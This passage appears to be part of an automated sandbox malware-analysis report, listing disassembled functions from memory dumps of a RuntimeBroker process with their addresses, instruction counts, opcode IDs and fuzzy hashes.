                                                                                                                            Function 00007FFD9BB762CF Relevance: .4, Instructions: 425COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e6f2d2a2dbe2c82715265f2a2b39a11e0cf44e5b413021b8042b75195693a1bb
                                                                                                                            • Instruction ID: 5704db470fddbad14a6c342833f8950b2e0bfefa8b5a7fa5eb5563eecd2a197b
                                                                                                                            • Opcode Fuzzy Hash: e6f2d2a2dbe2c82715265f2a2b39a11e0cf44e5b413021b8042b75195693a1bb
                                                                                                                            • Instruction Fuzzy Hash: 8AF1BF3061954A8FEB69CF58C4E06B53BA1FF45304B5541BDC84FCBADADA38E981CB41
                                                                                                                            Function 00007FFD9BB7127F Relevance: .4, Instructions: 425COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1b5c9cdd4d02b24b3633caec4202aeec9ab735fe6766457dceef9880c8751b97
                                                                                                                            • Instruction ID: b5b51c65e1a6eab6dd7f95fc0b47b9e125a095e53a50e2efd322f93b09990689
                                                                                                                            • Opcode Fuzzy Hash: 1b5c9cdd4d02b24b3633caec4202aeec9ab735fe6766457dceef9880c8751b97
                                                                                                                            • Instruction Fuzzy Hash: 42F1A17061954A8FEB68CF58C4E06B437A1FF45304B5546BDC84F8B6DACA38F982CB50
                                                                                                                            Function 00007FFD9BB722C1 Relevance: .4, Instructions: 406COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9959e9a15f0a7cc75cee47643e21a8eaf475b5acd2c8dad6aa0aa37f996f6c95
                                                                                                                            • Instruction ID: 76d3ac4442e65e78cfe26316b0be5398dbfce0b5aa48f25be95749672f036f60
                                                                                                                            • Opcode Fuzzy Hash: 9959e9a15f0a7cc75cee47643e21a8eaf475b5acd2c8dad6aa0aa37f996f6c95
                                                                                                                            • Instruction Fuzzy Hash: 14D1D230A0FA4A4FD379DBA8D4E157977E1FF45308B25057EC48E83AE2DA29F9428741
                                                                                                                            Function 00007FFD9BB762EF Relevance: .3, Instructions: 336COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 364db7036bfbf5ab0b03e3c0b2f734a33fde78a7234edea6c312753a38cd643d
                                                                                                                            • Instruction ID: 127f02a803e85f4ab1011a7031731bd01456d16983d31123b31d6830e84588f6
                                                                                                                            • Opcode Fuzzy Hash: 364db7036bfbf5ab0b03e3c0b2f734a33fde78a7234edea6c312753a38cd643d
                                                                                                                            • Instruction Fuzzy Hash: 84C19C3061A54A8FEB29CF58C4E05B13BA1FF45314B5545BDC88FCBADADA38E981CB41
                                                                                                                            Function 00007FFD9BB7129F Relevance: .3, Instructions: 335COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b8cbc6d40cf9b633f8693c913a3f843793643032bdd4c4b4450ef89c282b4ab0
                                                                                                                            • Instruction ID: 9828a42cf28c5a1371fc6c296d12e6d4878fcfd93d17559f8adec3f3fff2b136
                                                                                                                            • Opcode Fuzzy Hash: b8cbc6d40cf9b633f8693c913a3f843793643032bdd4c4b4450ef89c282b4ab0
                                                                                                                            • Instruction Fuzzy Hash: 32C1B03061954A8BEB2DCF58C0E05B537A1FF45304B5546BDC88F8BAEACA38F942CB50
                                                                                                                            Function 00007FFD9BB73547 Relevance: .3, Instructions: 312COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cf28fe1e11524de3619d28200971bda721cd650d46b59e66bfbb537a9aab9b9e
                                                                                                                            • Instruction ID: f9725418790655d15be0783119c1b8c55c31e02afb17d9ebbeb75e353b2e0d6e
                                                                                                                            • Opcode Fuzzy Hash: cf28fe1e11524de3619d28200971bda721cd650d46b59e66bfbb537a9aab9b9e
                                                                                                                            • Instruction Fuzzy Hash: B821B496F0F19B8AF77565E864B29FC1660EF51328F5A017AD05E878E2DC0C3B860292
                                                                                                                            Function 00007FFD9B7A95D1 Relevance: .3, Instructions: 311COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7a3000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 81b111c525529f5a1b5dea4353111dcd62b25e949044322f76b95f1fef382db2
                                                                                                                            • Instruction ID: 02bbe1b265948a5a893109aeb164e3dddab9f096b31b23be6ef41c548fde8245
                                                                                                                            • Opcode Fuzzy Hash: 81b111c525529f5a1b5dea4353111dcd62b25e949044322f76b95f1fef382db2
                                                                                                                            • Instruction Fuzzy Hash: 66A18270B1990D8FDB98EB68C4A5AB977E1FF98304B510679E01EC72E6DF34A842C741
                                                                                                                            Function 00007FFD9BB70B8A Relevance: .3, Instructions: 308COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 407cfbd21908654c13e1400ab3319d26a89b47cbed0b8a476af0b1f150cf7a4b
                                                                                                                            • Instruction ID: fc2859fcc83d4437e86a621435b14cff24220d4dbdeced7f6810230abe342965
                                                                                                                            • Opcode Fuzzy Hash: 407cfbd21908654c13e1400ab3319d26a89b47cbed0b8a476af0b1f150cf7a4b
                                                                                                                            • Instruction Fuzzy Hash: 44B10730A0DA4A4FDB59DB68C0E0AA4B7A1FF05704F8541BAD44EC7AD6DB38B951C790
                                                                                                                            Function 00007FFD9BB7000A Relevance: .3, Instructions: 294COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6d7a098658ad10fbcf394190edf1bfffbf689664d35e0cff57e2ec54c0d3befd
                                                                                                                            • Instruction ID: 1b8d917f006f0a45ded5e33f440e20118d13c164c83025548da1184b9382ea24
                                                                                                                            • Opcode Fuzzy Hash: 6d7a098658ad10fbcf394190edf1bfffbf689664d35e0cff57e2ec54c0d3befd
                                                                                                                            • Instruction Fuzzy Hash: 27913931A0EB894FEB7A4A6898B50757BE0FF42714B4605BFE0CEC79E3DD2869058351
                                                                                                                            Function 00007FFD9BB75BDA Relevance: .3, Instructions: 289COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e7cb961090911b6139d387c5b4c4d08dbd1b7b80b4cacd49359259001ca247bc
                                                                                                                            • Instruction ID: ff3d5f9e1ac9fdd5470f30efc57c88daf275d54140ccad1f4e5c80a40ad17c05
                                                                                                                            • Opcode Fuzzy Hash: e7cb961090911b6139d387c5b4c4d08dbd1b7b80b4cacd49359259001ca247bc
                                                                                                                            • Instruction Fuzzy Hash: ECA1173060EA8A8FE759DB68C4E0AA4BBA1FF05304F4541B9D04EC7ED6DB28B951C790
                                                                                                                            Function 00007FFD9BB750B6 Relevance: .3, Instructions: 266COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4f31ce0f968296abacff30b47b8ab9109a4d02ac1b0ea5b5c77b9de4364f5545
                                                                                                                            • Instruction ID: 328bcc960444aeb4e73512f387c6ea3c314d8418644ce122f196dab88b7b8dfc
                                                                                                                            • Opcode Fuzzy Hash: 4f31ce0f968296abacff30b47b8ab9109a4d02ac1b0ea5b5c77b9de4364f5545
                                                                                                                            • Instruction Fuzzy Hash: 00815A31B0EB4A4FE3749AA894B117977E0FF45318B16017ED48FC39E2DE29BA028751
                                                                                                                            Function 00007FFD9BB731F9 Relevance: .2, Instructions: 247COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 657328cd4b7b9f0b7e54ef2d148e798cb4ba6daaae66042a8a6b47a5cbf9ab5c
                                                                                                                            • Instruction ID: ba6322459aae3e641be1e5a8f79ab1169b372eee29a2c0755c431f6840dffb4f
                                                                                                                            • Opcode Fuzzy Hash: 657328cd4b7b9f0b7e54ef2d148e798cb4ba6daaae66042a8a6b47a5cbf9ab5c
                                                                                                                            • Instruction Fuzzy Hash: D971E771A0E94D4FE778DA5888A65B837D0FF44314B1602B9D49EC79F2DE18AB0B8781
                                                                                                                            Function 00007FFD9BB73DBB Relevance: .2, Instructions: 224COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 805cf15d1cbd5311dfb9f90185d908ed1a9eee5d370fe5bdf67ec8fe9779140a
                                                                                                                            • Instruction ID: 5c75f857e277651294c951993ce0ebc5310cf6878b590a1f66087be99b6cf836
                                                                                                                            • Opcode Fuzzy Hash: 805cf15d1cbd5311dfb9f90185d908ed1a9eee5d370fe5bdf67ec8fe9779140a
                                                                                                                            • Instruction Fuzzy Hash: 4471F630E1E54E8EEBA9DBA484A46FC7BB0FF49344F1100BAD00ED75E1DE286A42C750
                                                                                                                            Function 00007FFD9BB75BF1 Relevance: .2, Instructions: 151COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8c6135bdd7271cc26cede0fac980398e7e2d57fe0c28753d25f2aef69b04e18b
                                                                                                                            • Instruction ID: 1fccfcea5641cefd6c6bdcc6714245bd8ad32ce7ac294756972d8930fd131d9c
                                                                                                                            • Opcode Fuzzy Hash: 8c6135bdd7271cc26cede0fac980398e7e2d57fe0c28753d25f2aef69b04e18b
                                                                                                                            • Instruction Fuzzy Hash: 5651D170B19A0A9FE798DB68C0A4AA5B391FF54304F548279D00EC7EE6DF34F9518B80
                                                                                                                            Function 00007FFD9BB77937 Relevance: .1, Instructions: 127COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8a28387cf3c066fda0519f5bf2347353a957f862603741eefd4ab9e652f32b5e
                                                                                                                            • Instruction ID: bbdb75d7409145413ed358597917c235cc741cba5eb4928976a2d8e0192920cd
                                                                                                                            • Opcode Fuzzy Hash: 8a28387cf3c066fda0519f5bf2347353a957f862603741eefd4ab9e652f32b5e
                                                                                                                            • Instruction Fuzzy Hash: 0941733260D9498FDF98EF58C4A5DA4B3E1FFA9310B1401AAD04EC36E2DE21F945CB81
                                                                                                                            Function 00007FFD9BB728E7 Relevance: .1, Instructions: 127COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3e6d9c078bfb290172a4ad11d6e036905896b8d80f59b291c6c0d91d35f11d92
                                                                                                                            • Instruction ID: 6a80346afdaa62e1245014893ffd4c5385f7f8a757b178d3ee34bcd573e53077
                                                                                                                            • Opcode Fuzzy Hash: 3e6d9c078bfb290172a4ad11d6e036905896b8d80f59b291c6c0d91d35f11d92
                                                                                                                            • Instruction Fuzzy Hash: 8B41303260D94D8FDF98EB58C4A5EA877E1FFA9310B0405BAD04EC3696DE25E845CB81
                                                                                                                            Function 00007FFD9BB779E1 Relevance: .1, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b5403c0bfd91ae418bd15b52d91aec652859e25bf1c922240d224f60c9d3929a
                                                                                                                            • Instruction ID: 3f4f484c8d4f24eea35576e9580178fa00a2f5b9d5fa92b6884ec4ac44214f9a
                                                                                                                            • Opcode Fuzzy Hash: b5403c0bfd91ae418bd15b52d91aec652859e25bf1c922240d224f60c9d3929a
                                                                                                                            • Instruction Fuzzy Hash: 71315F316089498FDB58EF18C4A5D6473E1FFA9314B1505EED05AC72E2DE21E845CB81
                                                                                                                            Function 00007FFD9BB72991 Relevance: .1, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 467d1f07d49dea93de4feb648e0c19c7be7320cab693430fddfe28170d8debab
                                                                                                                            • Instruction ID: 6afbb9c7a6a5f78f8dd9563ce576bc836800beef4d355bbc5913e69f872d320d
                                                                                                                            • Opcode Fuzzy Hash: 467d1f07d49dea93de4feb648e0c19c7be7320cab693430fddfe28170d8debab
                                                                                                                            • Instruction Fuzzy Hash: 9E31623160D9498FDB5CEF18C4A5EA477E1FFA931070406A9D05EC7296DE25E845CB81
                                                                                                                            Function 00007FFD9BB7017D Relevance: .1, Instructions: 117COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: da1371ae8005b969023de401544cefab25461c650ce6c648ef82e0fc5dfd4c53
                                                                                                                            • Instruction ID: 91e0242c3bb8ee87af0d8b9d755f901a98922370e2cde5e826d8063852ead414
                                                                                                                            • Opcode Fuzzy Hash: da1371ae8005b969023de401544cefab25461c650ce6c648ef82e0fc5dfd4c53
                                                                                                                            • Instruction Fuzzy Hash: 3E316832B0EB494FE7795A6888A503A7BE4FF45B58B51017FE4CFC39E3DD14AA024252
                                                                                                                            Function 00007FFD9BB7797B Relevance: .1, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a62098fd350d1e301f5dbb88101c254430a1bd3a8722b20f84548de9c4c48ce6
                                                                                                                            • Instruction ID: 8b9bb686b615f580555abe3886fe9bef13d9b3dc9ffecbc7d02435c1bf7f78de
                                                                                                                            • Opcode Fuzzy Hash: a62098fd350d1e301f5dbb88101c254430a1bd3a8722b20f84548de9c4c48ce6
                                                                                                                            • Instruction Fuzzy Hash: C431823160D9498FDB98EF28C4A5DA4B3E1FFA9310B1505AED04EC76E2DE25F941CB81
                                                                                                                            Function 00007FFD9BB7292B Relevance: .1, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 54930bdefdb2a5454e1fb77cd551293412eb1bfefe60c040210ff0d1583a7430
                                                                                                                            • Instruction ID: 4572dc3e8a469b92e765de7fa6803ea14e89a0063794fc42bc644a535188d15a
                                                                                                                            • Opcode Fuzzy Hash: 54930bdefdb2a5454e1fb77cd551293412eb1bfefe60c040210ff0d1583a7430
                                                                                                                            • Instruction Fuzzy Hash: 5331823160D94D8FDB98EF18C4A5EA877E2FFA9310B0405ADD04EC76A6DE24F845CB81
                                                                                                                            Function 00007FFD9BB74A9D Relevance: .1, Instructions: 101COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1b5913a382600cf1c52053dbdfc0687eed252b3ec8086efe574b2810cea6bd4e
                                                                                                                            • Instruction ID: 8f8eb28bf32dc0e7d5caaea810f587fa7cdea10def09f98dd966ac9430cb1c16
                                                                                                                            • Opcode Fuzzy Hash: 1b5913a382600cf1c52053dbdfc0687eed252b3ec8086efe574b2810cea6bd4e
                                                                                                                            • Instruction Fuzzy Hash: 06316171B0990E8FDB58DA98D4A19ACB7A1FF44314B11423DD01EC36A2CF64B912CB80
                                                                                                                            Function 00007FFD9BB726F5 Relevance: .1, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8ae93d846a9d165faedc2f63ff99ff6d32343c07c6ae5c65c6f7e15ad8fbc4a4
                                                                                                                            • Instruction ID: b1f446ddfcdf8ecc56cfe01f8085dd25a2005be2b33e079b17a7e17244447636
                                                                                                                            • Opcode Fuzzy Hash: 8ae93d846a9d165faedc2f63ff99ff6d32343c07c6ae5c65c6f7e15ad8fbc4a4
                                                                                                                            • Instruction Fuzzy Hash: 58312830E0A54ECFEBA8DBD885A15BE7BB1FF55304F51017AD41ED3AE1CA386A409B41
                                                                                                                            Function 00007FFD9BB74B74 Relevance: .1, Instructions: 90COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7d734368838b28ef1ff0a3d6bb82f4550587f40c08cd612eaead76a9ebc99902
                                                                                                                            • Instruction ID: c40a50ba68c5f3a28fd655157939d2dc8cf1e0f054a84a824607ad074f336789
                                                                                                                            • Opcode Fuzzy Hash: 7d734368838b28ef1ff0a3d6bb82f4550587f40c08cd612eaead76a9ebc99902
                                                                                                                            • Instruction Fuzzy Hash: 9E213421B0E64D4FEB68D7A898B22EC77E0FF49355F0101BDD05EC76E2DA182D068350
                                                                                                                            Function 00007FFD9BB76631 Relevance: .1, Instructions: 89COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5b6e36a1efeb5ed71a8927de6bb3113bbf354a7e8a2e47783f4605c27e6d18ce
                                                                                                                            • Instruction ID: 096e71e5edc6f99c7dd44105487e2145973e09815b393003515982a327c653ef
                                                                                                                            • Opcode Fuzzy Hash: 5b6e36a1efeb5ed71a8927de6bb3113bbf354a7e8a2e47783f4605c27e6d18ce
                                                                                                                            • Instruction Fuzzy Hash: 42312910A1E5DE4BE7398A5888B05B47B51FF92304B1E46FAD49FCB8EBC82CF5818341
                                                                                                                            Function 00007FFD9BB715E2 Relevance: .1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2476f6404f165e57679e2e7bcc31edf8d1d182c470523e565d15d5874f0c9085
                                                                                                                            • Instruction ID: 0fce84a40a59580a1b3f36087ea86182972695670a41110ca7ae779642204823
                                                                                                                            • Opcode Fuzzy Hash: 2476f6404f165e57679e2e7bcc31edf8d1d182c470523e565d15d5874f0c9085
                                                                                                                            • Instruction Fuzzy Hash: 32310810A1E59E8BE33AC75884B05747BA1FF52304B1D4ABAD09F8B8E7C41CFA458361
                                                                                                                            Function 00007FFD9B780C25 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3d0a71632fd233ebcc6cf53de665b142065bfed93150bb5b5bdad6369ae5df26
                                                                                                                            • Instruction ID: 116703c73e7f1b9966292bdf0ee1e77becf5044a7bd1b7f0f26592ed940c2268
                                                                                                                            • Opcode Fuzzy Hash: 3d0a71632fd233ebcc6cf53de665b142065bfed93150bb5b5bdad6369ae5df26
                                                                                                                            • Instruction Fuzzy Hash: 3021DD36B0D74D8ED721AB6898650EC7B60EF52311F1543F7D054861E2D93866458781
                                                                                                                            Function 00007FFD9BB73A32 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
